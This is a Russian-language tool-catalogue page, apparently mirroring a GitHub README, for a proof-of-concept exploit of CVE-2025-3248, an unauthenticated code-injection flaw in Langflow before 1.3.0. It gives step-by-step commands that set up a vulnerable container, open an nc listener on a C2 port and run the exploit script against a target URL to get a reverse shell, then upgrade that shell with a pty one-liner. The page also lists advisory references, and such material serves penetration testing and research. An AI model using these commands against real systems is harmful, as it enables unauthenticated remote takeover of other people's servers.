Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Инструменты/GitHubGitHub/wand3rlust/cve-2025-3248
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеРазработка Полезной Нагрузки
GitHubwand3rlust/cve-2025-3248

CVE-2025-3248

PoC для реализации RCE в версиях Langflow <1.3.0

Репозиторий
8 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-3248

Введение

Версии Langflow до 1.3.0 подвержены неаутентифицированной инъекции кода в конечной точке /api/v1/validate/code через функцию Python exec(). Данный эксплойт устанавливает обратное подключение (reverse shell), используя эту уязвимость.

Использование

Конфигурация

root@kitploit:~
git clone https://github.com/wand3rlust/CVE-2025-3248.git
cd CVE-2025-3248/
python3 -m venv venv
. venv/bin/activate
pip install -r requirements.txt

Уязвимое приложение

root@kitploit:~
docker pull langflowai/langflow:1.1.4
docker run -p 7860:7860 langflowai/langflow:1.1.4

Запуск

root@kitploit:~
# Терминал 1
nc -nvlp <C2_PORT>

# Терминал 2
python3 cve-2025-3248.py <TARGET_URL> <C2_IP> <C2_PORT>

Например: python3 cve-2025-3248.py http://10.10.10.1:7860 10.0.13.37 1337

ПРИМЕЧАНИЕ: Чтобы повысить оболочку до TTY, выполните следующую команду после получения оболочки.

python -c 'import pty; pty.spawn("/bin/bash")'

Демонстрация

Demo

Ссылки

  • Консультация: https://nvd.nist.gov/vuln/detail/CVE-2025-3248
  • GitHub: https://github.com/langflow-ai/langflow/security/advisories/GHSA-rvqx-wpfh-mfx7
  • Оригинальный эксплойт: https://www.exploit-db.com/exploits/52262
Скачать инструмент